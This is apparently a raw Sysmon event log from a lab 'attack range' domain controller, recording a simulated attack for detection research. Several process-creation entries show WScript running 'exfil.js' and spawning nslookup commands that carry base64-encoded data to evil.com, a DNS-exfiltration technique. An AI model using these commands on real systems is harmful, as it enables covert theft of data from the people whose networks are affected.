10341000x8000000000000000206274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.232{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.232{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.232{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8842-000000005F02}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.232{2E1864BB-18E0-629A-6742-000000005F02}39764040C:\Windows\System32\WScript.exe{2E1864BB-18E4-629A-8842-000000005F02}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.247{2E1864BB-18E4-629A-8842-000000005F02}4572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlosnnifk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.232{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlybbt.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.201{2E1864BB-18E4-629A-8642-000000005F02}52083448C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-8742-000000005F02}6160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.201{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.201{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.201{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8742-000000005F02}6160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.201{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.201{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.201{2E1864BB-18E4-629A-8542-000000005F02}70285420C:\Windows\system32\cmd.exe{2E1864BB-18E4-629A-8742-000000005F02}6160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.208{2E1864BB-18E4-629A-8742-000000005F02}6160C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E4-629A-8542-000000005F02}7028C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlybbt.tmp 2>&1 354300x8000000000000000206260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.503{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61410-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.502{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61410-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.502{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50438- 354300x8000000000000000206257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.502{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50437- 354300x8000000000000000206256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.501{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50436- 354300x8000000000000000206255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.501{00000000-0000-0000-0000-000000000000}1660<unknown process>-udptruefalse127.0.0.1-50436-false127.0.0.1-53domain 354300x8000000000000000206254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.392{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-50435-false127.0.0.1-53domain 354300x8000000000000000206253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.391{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61721-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.389{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61721-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000206251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.389{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50435- 354300x8000000000000000206250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.389{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-50435-false127.0.0.1-53domain 354300x8000000000000000206249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.388{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-50434-false127.0.0.1-53domain 354300x8000000000000000206248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.388{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50434- 10341000x8000000000000000206247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.185{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-8642-000000005F02}5208C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000206246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.388{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-50434-false127.0.0.1-53domain 10341000x8000000000000000206245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.185{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-8642-000000005F02}5208C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000206244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.388{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-50433-false127.0.0.1-53domain 354300x8000000000000000206243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.388{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50433- 354300x8000000000000000206242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.388{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-50433-false127.0.0.1-53domain 10341000x8000000000000000206241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.170{2E1864BB-18E4-629A-8642-000000005F02}52083448C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-8542-000000005F02}7028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.166{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8642-000000005F02}5208C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000206239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.166{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B79EEC9A65F9FA387BFA5DD7708BD0,SHA256=88EC1240A94B120D303B16500CF8EB808403A12E34DD98463D9F985820E66A40,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.148{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.148{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.148{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.148{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.148{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8542-000000005F02}7028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.148{2E1864BB-18E0-629A-6742-000000005F02}39763860C:\Windows\System32\WScript.exe{2E1864BB-18E4-629A-8542-000000005F02}7028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.156{2E1864BB-18E4-629A-8542-000000005F02}7028C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlybbt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 